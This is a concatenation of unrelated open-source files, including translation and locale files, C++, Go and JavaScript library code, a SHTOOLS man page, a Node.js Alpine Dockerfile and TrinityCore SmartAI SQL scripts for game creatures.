<source>OK</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="351"/>
<source>Disk Format Error: Please format the disk with FAT32</source>
<translation type="unfinished"></translation>
</message>
<message>
<source>Ok</source>
<translation type="vanished">Okej</translation>
</message>
</context>
</TS>
| {
"pile_set_name": "Github"
} |
<%@ Register TagPrefix="cc1" Namespace="GHTWebControls" Assembly="MainsoftWebApp" %>
<%@ Page Language="c#" AutoEventWireup="false" Codebehind="WebControl_Enabled.aspx.cs" Inherits="GHTTests.System_Web_dll.System_Web_UI_WebControls.WebControl_Enabled" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<title>WebControl_Enabled</title>
<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
<meta content="Visual Basic .NET 7.1" name="CODE_LANGUAGE">
<meta content="JavaScript" name="vs_defaultClientScript">
<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
<script LANGUAGE="JavaScript">
function ScriptTest()
{
var theform;
if (window.navigator.appName.toLowerCase().indexOf("netscape") > -1) {
theform = document.forms["Form1"];
}
else {
theform = document.Form1;
}
}
</script>
</HEAD>
<body>
<form id="Form1" method="post" runat="server">
</form>
</body>
</HTML>
| {
"pile_set_name": "Github"
} |
#!/bin/sh
exec retroarch-clover km_cannonball "$@"
| {
"pile_set_name": "Github"
} |
<#
// ReSharper disable UnusedVariable
var methods =
new[]
{
new {Name = "Control", NoIdx = false, NoChr = false},
new {Name = "HighSurrogate", NoIdx = false, NoChr = false},
new {Name = "LowSurrogate", NoIdx = false, NoChr = false},
new {Name = "Digit", NoIdx = true, NoChr = false},
new {Name = "Letter", NoIdx = true, NoChr = false},
new {Name = "LetterOrDigit", NoIdx = true, NoChr = false},
new {Name = "Lower", NoIdx = true, NoChr = false},
new {Name = "Upper", NoIdx = true, NoChr = false},
new {Name = "Number", NoIdx = true, NoChr = false},
new {Name = "Punctuation", NoIdx = true, NoChr = false},
new {Name = "Separator", NoIdx = true, NoChr = false},
new {Name = "Surrogate", NoIdx = false, NoChr = false},
new {Name = "SurrogatePair", NoIdx = false, NoChr = true},
new {Name = "Symbol", NoIdx = true, NoChr = false},
new {Name = "WhiteSpace", NoIdx = true, NoChr = false}
};
#> | {
"pile_set_name": "Github"
} |
//
// Copyright (c) 2012 The ANGLE Project Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
//
#include "compiler/translator/timing/RestrictVertexShaderTiming.h"
void RestrictVertexShaderTiming::visitSymbol(TIntermSymbol* node)
{
if (IsSampler(node->getBasicType())) {
++mNumErrors;
mSink.message(EPrefixError,
node->getLine(),
"Samplers are not permitted in vertex shaders");
}
}
| {
"pile_set_name": "Github"
} |
.\" Automatically generated by Pandoc 2.10
.\"
.TH "plegendre_d1" "1" "2020-04-07" "Fortran 95" "SHTOOLS 4.7"
.hy
.SH PLegendre_d1
.PP
Compute all the unnormalized Legendre polynomials and first derivatives.
.SH Usage
.PP
call PLegendre_d1 (\f[C]p\f[R], \f[C]dp\f[R], \f[C]lmax\f[R],
\f[C]z\f[R], \f[C]exitstatus\f[R])
.SH Parameters
.TP
\f[B]\f[CB]p\f[B]\f[R] : output, real(dp), dimension (\f[B]\f[CB]lmax\f[B]\f[R]+1)
An array of unnormalized Legendre polynomials up to degree
\f[C]lmax\f[R].
Degree \f[C]l\f[R] corresponds to array index \f[C]l\f[R]+1.
.TP
\f[B]\f[CB]dp\f[B]\f[R] : output, real(dp), dimension (\f[B]\f[CB]lmax\f[B]\f[R]+1)
An array of the first derivatives of the unnormalized Legendre
polynomials up to degree \f[C]lmax\f[R].
Degree \f[C]l\f[R] corresponds to array index \f[C]l\f[R]+1.
.TP
\f[B]\f[CB]lmax\f[B]\f[R] : input, integer
The maximum degree of the Legendre polynomials to be computed.
.TP
\f[B]\f[CB]z\f[B]\f[R] : input, real(dp)
The argument of the Legendre polynomial.
.TP
\f[B]\f[CB]exitstatus\f[B]\f[R] : output, optional, integer
If present, instead of executing a STOP when an error is encountered,
the variable exitstatus will be returned describing the error.
0 = No errors; 1 = Improper dimensions of input array; 2 = Improper
bounds for input variable; 3 = Error allocating memory; 4 = File IO
error.
.SH Description
.PP
\f[C]PLegendre_d1\f[R] will calculate all of the unnormalized Legendre
polynomials and first derivatives up to degree \f[C]lmax\f[R] for a
given argument.
These are calculated using a standard three-term recursion formula, and
the integral of the Legendre polynomials over the interval [-1, 1] is
\f[C]2/(2l+1)\f[R].
Note that the derivative of the Legendre polynomials is calculated with
respect to its arguement \f[C]z\f[R], and not latitude or colatitude.
If \f[C]z=cos(theta)\f[R], where \f[C]theta\f[R] is the colatitude, then
it is only necessary to multiply \f[C]dp\f[R] by \f[C]-sin(theta)\f[R]
to obtain the derivative with respect to \f[C]theta\f[R].
.SH See also
.PP
plbar, plbar_d1, plmbar, plmbar_d1, plon, plon_d1, plmon, plmon_d1,
plschmidt, plschmidt_d1, plmschmidt, plmschmidt_d1, plegendre,
plegendrea, plegendrea_d1
| {
"pile_set_name": "Github"
} |
/**
* Select2 Icelandic translation.
*/
(function ($) {
"use strict";
$.fn.select2.locales['is'] = {
formatNoMatches: function () { return "Ekkert fannst"; },
formatInputTooShort: function (input, min) { var n = min - input.length; return "Vinsamlegast skrifið " + n + " staf" + (n > 1 ? "i" : "") + " í viðbót"; },
formatInputTooLong: function (input, max) { var n = input.length - max; return "Vinsamlegast styttið texta um " + n + " staf" + (n > 1 ? "i" : ""); },
formatSelectionTooBig: function (limit) { return "Þú getur aðeins valið " + limit + " atriði"; },
formatLoadMore: function (pageNumber) { return "Sæki fleiri niðurstöður…"; },
formatSearching: function () { return "Leita…"; }
};
$.extend($.fn.select2.defaults, $.fn.select2.locales['is']);
})(jQuery);
| {
"pile_set_name": "Github"
} |
// Code generated by cmd/cgo -godefs; DO NOT EDIT.
// cgo -godefs defs_linux.go
package socket
type iovec struct {
Base *byte
Len uint32
}
type msghdr struct {
Name *byte
Namelen uint32
Iov *iovec
Iovlen uint32
Control *byte
Controllen uint32
Flags int32
}
type mmsghdr struct {
Hdr msghdr
Len uint32
}
type cmsghdr struct {
Len uint32
Level int32
Type int32
}
type sockaddrInet struct {
Family uint16
Port uint16
Addr [4]byte /* in_addr */
X__pad [8]uint8
}
type sockaddrInet6 struct {
Family uint16
Port uint16
Flowinfo uint32
Addr [16]byte /* in6_addr */
Scope_id uint32
}
const (
sizeofIovec = 0x8
sizeofMsghdr = 0x1c
sizeofCmsghdr = 0xc
sizeofSockaddrInet = 0x10
sizeofSockaddrInet6 = 0x1c
)
| {
"pile_set_name": "Github"
} |
/* -----------------------------------------------------------------------------
Software License for The Fraunhofer FDK AAC Codec Library for Android
© Copyright 1995 - 2018 Fraunhofer-Gesellschaft zur Förderung der angewandten
Forschung e.V. All rights reserved.
1. INTRODUCTION
The Fraunhofer FDK AAC Codec Library for Android ("FDK AAC Codec") is software
that implements the MPEG Advanced Audio Coding ("AAC") encoding and decoding
scheme for digital audio. This FDK AAC Codec software is intended to be used on
a wide variety of Android devices.
AAC's HE-AAC and HE-AAC v2 versions are regarded as today's most efficient
general perceptual audio codecs. AAC-ELD is considered the best-performing
full-bandwidth communications codec by independent studies and is widely
deployed. AAC has been standardized by ISO and IEC as part of the MPEG
specifications.
Patent licenses for necessary patent claims for the FDK AAC Codec (including
those of Fraunhofer) may be obtained through Via Licensing
(www.vialicensing.com) or through the respective patent owners individually for
the purpose of encoding or decoding bit streams in products that are compliant
with the ISO/IEC MPEG audio standards. Please note that most manufacturers of
Android devices already license these patent claims through Via Licensing or
directly from the patent owners, and therefore FDK AAC Codec software may
already be covered under those patent licenses when it is used for those
licensed purposes only.
Commercially-licensed AAC software libraries, including floating-point versions
with enhanced sound quality, are also available from Fraunhofer. Users are
encouraged to check the Fraunhofer website for additional applications
information and documentation.
2. COPYRIGHT LICENSE
Redistribution and use in source and binary forms, with or without modification,
are permitted without payment of copyright license fees provided that you
satisfy the following conditions:
You must retain the complete text of this software license in redistributions of
the FDK AAC Codec or your modifications thereto in source code form.
You must retain the complete text of this software license in the documentation
and/or other materials provided with redistributions of the FDK AAC Codec or
your modifications thereto in binary form. You must make available free of
charge copies of the complete source code of the FDK AAC Codec and your
modifications thereto to recipients of copies in binary form.
The name of Fraunhofer may not be used to endorse or promote products derived
from this library without prior written permission.
You may not charge copyright license fees for anyone to use, copy or distribute
the FDK AAC Codec software or your modifications thereto.
Your modified versions of the FDK AAC Codec must carry prominent notices stating
that you changed the software and the date of any change. For modified versions
of the FDK AAC Codec, the term "Fraunhofer FDK AAC Codec Library for Android"
must be replaced by the term "Third-Party Modified Version of the Fraunhofer FDK
AAC Codec Library for Android."
3. NO PATENT LICENSE
NO EXPRESS OR IMPLIED LICENSES TO ANY PATENT CLAIMS, including without
limitation the patents of Fraunhofer, ARE GRANTED BY THIS SOFTWARE LICENSE.
Fraunhofer provides no warranty of patent non-infringement with respect to this
software.
You may use this FDK AAC Codec software or modifications thereto only for
purposes that are authorized by appropriate patent licenses.
4. DISCLAIMER
This FDK AAC Codec software is provided by Fraunhofer on behalf of the copyright
holders and contributors "AS IS" and WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES,
including but not limited to the implied warranties of merchantability and
fitness for a particular purpose. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE for any direct, indirect, incidental, special, exemplary,
or consequential damages, including but not limited to procurement of substitute
goods or services; loss of use, data, or profits, or business interruption,
however caused and on any theory of liability, whether in contract, strict
liability, or tort (including negligence), arising in any way out of the use of
this software, even if advised of the possibility of such damage.
5. CONTACT INFORMATION
Fraunhofer Institute for Integrated Circuits IIS
Attention: Audio and Multimedia Departments - FDK AAC LL
Am Wolfsmantel 33
91058 Erlangen, Germany
www.iis.fraunhofer.de/amm
[email protected]
----------------------------------------------------------------------------- */
/******************* Library for basic calculation routines ********************
Author(s):
Description:
*******************************************************************************/
#if defined(__mips_dsp)
#ifndef FUNCTION_getScalefactor_DBL
#define FUNCTION_getScalefactor_DBL
/*!
*
* \brief Calculate max possible scale factor for input vector
*
* \return Maximum scale factor
*
* This function can constitute a significant amount of computational
* complexity - very much depending on the bitrate. Since it is a rather small
* function, effective assembler optimization might be possible.
*
*/
SCALE_INLINE
INT getScalefactor(const FIXP_DBL *vector, /*!< Pointer to input vector */
INT len) /*!< Length of input vector */
{
INT i;
FIXP_DBL maxVal = FL2FX_DBL(0.0f);
for (i = len; i != 0; i--) {
maxVal |= __builtin_mips_absq_s_w(*vector++);
}
return fixMax((INT)0, (CntLeadingZeros(maxVal) - 1));
}
#endif
#endif /*__mips_dsp */
| {
"pile_set_name": "Github"
} |
var baseToString = require('./_baseToString'),
castSlice = require('./_castSlice'),
charsEndIndex = require('./_charsEndIndex'),
stringToArray = require('./_stringToArray'),
toString = require('./toString');
/** Used to match leading and trailing whitespace. */
var reTrimEnd = /\s+$/;
/**
* Removes trailing whitespace or specified characters from `string`.
*
* @static
* @memberOf _
* @since 4.0.0
* @category String
* @param {string} [string=''] The string to trim.
* @param {string} [chars=whitespace] The characters to trim.
* @param- {Object} [guard] Enables use as an iteratee for methods like `_.map`.
* @returns {string} Returns the trimmed string.
* @example
*
* _.trimEnd(' abc ');
* // => ' abc'
*
* _.trimEnd('-_-abc-_-', '_-');
* // => '-_-abc'
*/
function trimEnd(string, chars, guard) {
string = toString(string);
if (string && (guard || chars === undefined)) {
return string.replace(reTrimEnd, '');
}
if (!string || !(chars = baseToString(chars))) {
return string;
}
var strSymbols = stringToArray(string),
end = charsEndIndex(strSymbols, stringToArray(chars)) + 1;
return castSlice(strSymbols, 0, end).join('');
}
module.exports = trimEnd;
| {
"pile_set_name": "Github"
} |
#pragma once
#include "il2cpp-config.h"
#ifndef _MSC_VER
# include <alloca.h>
#else
# include <malloc.h>
#endif
#include <stdint.h>
#include "mscorlib_System_Object2689449295.h"
// System.Collections.IEnumerator
struct IEnumerator_t1466026749;
#ifdef __clang__
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Winvalid-offsetof"
#pragma clang diagnostic ignored "-Wunused-variable"
#endif
// System.Security.Cryptography.X509Certificates.X509ChainElementEnumerator
struct X509ChainElementEnumerator_t3304975821 : public Il2CppObject
{
public:
// System.Collections.IEnumerator System.Security.Cryptography.X509Certificates.X509ChainElementEnumerator::enumerator
Il2CppObject * ___enumerator_0;
public:
inline static int32_t get_offset_of_enumerator_0() { return static_cast<int32_t>(offsetof(X509ChainElementEnumerator_t3304975821, ___enumerator_0)); }
inline Il2CppObject * get_enumerator_0() const { return ___enumerator_0; }
inline Il2CppObject ** get_address_of_enumerator_0() { return &___enumerator_0; }
inline void set_enumerator_0(Il2CppObject * value)
{
___enumerator_0 = value;
Il2CppCodeGenWriteBarrier(&___enumerator_0, value);
}
};
#ifdef __clang__
#pragma clang diagnostic pop
#endif
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
////////////////////////////////////////////////////////////////////
//
// Defines a class for holding several meta data of the program
//
/////////////////////////////////////////////////////////////////////
#include "basics/execmeta.h"
#include <string>
namespace heron {
namespace common {
const std::string& ExecutableMetadata::name() const { return name_; }
ExecutableMetadata& ExecutableMetadata::setName(const char* argv0) {
name_ = std::string(argv0);
return *this;
}
const std::string& ExecutableMetadata::instance() const { return instance_; }
ExecutableMetadata& ExecutableMetadata::setInstance(const char* instance) {
instance_ = std::string(instance);
return *this;
}
const std::string& ExecutableMetadata::package() const { return package_; }
ExecutableMetadata& ExecutableMetadata::setPackage(const char* package) {
package_ = std::string(package);
return *this;
}
const std::string& ExecutableMetadata::version() const { return version_; }
ExecutableMetadata& ExecutableMetadata::setVersion(const char* version) {
version_ = std::string(version);
return *this;
}
const std::string& ExecutableMetadata::majorVersion() const { return major_; }
ExecutableMetadata& ExecutableMetadata::setMajorVersion(const char* major) {
major_ = std::string(major);
return *this;
}
const std::string& ExecutableMetadata::minorVersion() const { return minor_; }
ExecutableMetadata& ExecutableMetadata::setMinorVersion(const char* minor) {
minor_ = std::string(minor);
return *this;
}
const std::string& ExecutableMetadata::patchNumber() const { return patch_; }
ExecutableMetadata& ExecutableMetadata::setPatchNumber(const char* patch) {
patch_ = std::string(patch);
return *this;
}
const std::string& ExecutableMetadata::compileUser() const { return compile_user_; }
ExecutableMetadata& ExecutableMetadata::setCompileUser(const char* user) {
compile_user_ = std::string(user);
return *this;
}
const std::string& ExecutableMetadata::compileHost() const { return compile_host_; }
ExecutableMetadata& ExecutableMetadata::setCompileHost(const char* host) {
compile_host_ = std::string(host);
return *this;
}
const std::string& ExecutableMetadata::compileTime() const { return compile_time_; }
ExecutableMetadata& ExecutableMetadata::setCompileTime(const char* time) {
compile_time_ = std::string(time);
return *this;
}
const std::string& ExecutableMetadata::gitSha() const { return git_sha_; }
ExecutableMetadata& ExecutableMetadata::setGitSha(const char* git_sha) {
git_sha_ = std::string(git_sha);
return *this;
}
const std::string& ExecutableMetadata::gitBranch() const { return git_branch_; }
ExecutableMetadata& ExecutableMetadata::setGitBranch(const char* git_branch) {
git_branch_ = std::string(git_branch);
return *this;
}
const std::time_t& ExecutableMetadata::startTime() const { return start_time_; }
ExecutableMetadata& ExecutableMetadata::setStartTime(const std::time_t& time) {
start_time_ = time;
return *this;
}
const std::string& ExecutableMetadata::logPrefix() const { return log_prefix_; }
ExecutableMetadata& ExecutableMetadata::setLogPrefix(const char* log_prefix) {
log_prefix_ = std::string(log_prefix);
return *this;
}
const std::string& ExecutableMetadata::logDirectory() const { return log_directory_; }
ExecutableMetadata& ExecutableMetadata::setLogDirectory(const char* log_directory) {
log_directory_ = std::string(log_directory);
return *this;
}
bool ExecutableMetadata::unitTest() const { return unit_test_; }
ExecutableMetadata& ExecutableMetadata::setUnitTest(const bool unit_test) {
unit_test_ = unit_test;
return *this;
}
} // namespace common
} // namespace heron
| {
"pile_set_name": "Github"
} |
FROM alpine:3.10
ENV NODE_VERSION 10.22.1
RUN addgroup -g 1000 node \
&& adduser -u 1000 -G node -s /bin/sh -D node \
&& apk add --no-cache \
libstdc++ \
&& apk add --no-cache --virtual .build-deps \
curl \
&& ARCH= && alpineArch="$(apk --print-arch)" \
&& case "${alpineArch##*-}" in \
x86_64) \
ARCH='x64' \
CHECKSUM="72f0693db768ef07c712e7a575bd6914b8a74338e91e9e969c8d7e2a832d38f3" \
;; \
*) ;; \
esac \
&& if [ -n "${CHECKSUM}" ]; then \
set -eu; \
curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; \
echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - \
&& tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner \
&& ln -s /usr/local/bin/node /usr/local/bin/nodejs; \
else \
echo "Building from source" \
# backup build
&& apk add --no-cache --virtual .build-deps-full \
binutils-gold \
g++ \
gcc \
gnupg \
libgcc \
linux-headers \
make \
python \
# gpg keys listed at https://github.com/nodejs/node#release-keys
&& for key in \
4ED778F539E3634C779C87C6D7062848A1AB005C \
94AE36675C464D64BAFA68DD7434390BDBE9B9C5 \
71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 \
8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 \
C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 \
C82FA3AE1CBEDC6BE46B9360C43CEC45C17AB93C \
DD8F2338BAE7501E3DD5AC78C273792F7D83545D \
A48C2BEE680E841632CD4E44F07496B3EB3C1762 \
108F52B48DB57BB0CC439B2997B01419BD92F80A \
B9E2F5981AA6E0CD28160D9FF13993A75599653C \
; do \
gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || \
gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || \
gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; \
done \
&& curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" \
&& curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" \
&& gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc \
&& grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - \
&& tar -xf "node-v$NODE_VERSION.tar.xz" \
&& cd "node-v$NODE_VERSION" \
&& ./configure \
&& make -j$(getconf _NPROCESSORS_ONLN) V= \
&& make install \
&& apk del .build-deps-full \
&& cd .. \
&& rm -Rf "node-v$NODE_VERSION" \
&& rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; \
fi \
&& rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" \
&& apk del .build-deps \
# smoke tests
&& node --version \
&& npm --version
ENV YARN_VERSION 1.22.4
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar \
&& for key in \
6A010C5166006599AA17F08146C2130DFD2497F5 \
; do \
gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || \
gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || \
gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; \
done \
&& curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" \
&& curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" \
&& gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& mkdir -p /opt \
&& tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ \
&& ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn \
&& ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg \
&& rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz \
&& apk del .build-deps-yarn \
# smoke test
&& yarn --version
COPY docker-entrypoint.sh /usr/local/bin/
ENTRYPOINT ["docker-entrypoint.sh"]
CMD [ "node" ]
| {
"pile_set_name": "Github"
} |
/*
Package phpv contains all required types and interfaces for storing Goro values, context or compiled PHP code.
*/
package phpv
| {
"pile_set_name": "Github"
} |
-- SAI for Defias Messenger
SET @ENTRY := 550;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Defias Messenger - On Aggro - Say Random text'),
(@ENTRY,0,1,0,2,0,100,1,0,15,0,0,25,1,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Defias Messenger - HP@15% - Flee');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE entry BETWEEN -211 AND -209;
DELETE FROM `creature_text` WHERE `entry` IN (550);
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(550,0,0, 'I have a special message for $N. And it says you must die!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say'),
(550,0,1, 'I''ll deliver you, weak $C, to the afterlife!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say'),
(550,0,2, 'Die in the name of Edwin van Cleef!',12,0,100,0,0,0, 'Defias Messenger - Aggro Random Say');
-- SAI for Cursed Sailor
SET @ENTRY := 1157;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Cursed Sailor - On Aggro - Say Random text');
-- SAI for Cursed Marine
SET @ENTRY := 1158;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Cursed Marine - On Aggro - Say Random text'),
(@ENTRY,0,1,2,0,0,100,0,4200,19600,27500,57700,11,10651,32,0,0,0,0,2,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye'),
(@ENTRY,0,2,0,61,0,100,0,0,0,0,0,11,3360,32,0,0,0,0,2,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye');
-- SAI for Captain Halyndor
SET @ENTRY := 1160;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,4,0,20,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Captain Halyndor - On Aggro - Say Random text'),
(@ENTRY,0,1,2,0,0,100,0,3600,4800,11000,23300,11,10651,32,0,0,0,0,4,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye'),
(@ENTRY,0,2,0,61,0,100,0,0,0,0,0,11,3360,32,0,0,0,0,4,0,0,0,0,0,0,0, 'Cursed Marine - Combat - Cast Curse of the Eye'),
(@ENTRY,0,3,0,0,0,100,0,7300,8300,11000,26400,11,3389,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Captain Halyndor - Combat - Cast Ward of the Eye');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-42,-103,-161);
DELETE FROM `creature_text` WHERE `entry` IN (1157,1158,1160);
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(1157,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
(1157,0,1, 'Brains...',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
(1157,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
(1158,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1158,0,1, 'Brains...',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1158,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1160,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say'),
(1160,0,1, 'Brains...',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say'),
(1160,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say');
-- SAI for Mottled Screecher
SET @ENTRY := 1021;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,1,2,0,100,1,0,20,0,0,39,20,0,0,0,0,0,0,0,0,0,0,0,0,0, 'Mottled Screecher - HP@20% - Call for help'),
(@ENTRY,0,1,0,61,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Mottled Screecher - HP@20% - Say text');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-100);
DELETE FROM `creature_text` WHERE `entry` IN (1021);
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(1021,0,0, '%s lets out a high pitched screech, calling for help!',16,0,100,0,0,0, 'Mottled Screecher - Call for help Say');
-- SAI for Spectral Stable Hand
SET @ENTRY := 15551;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
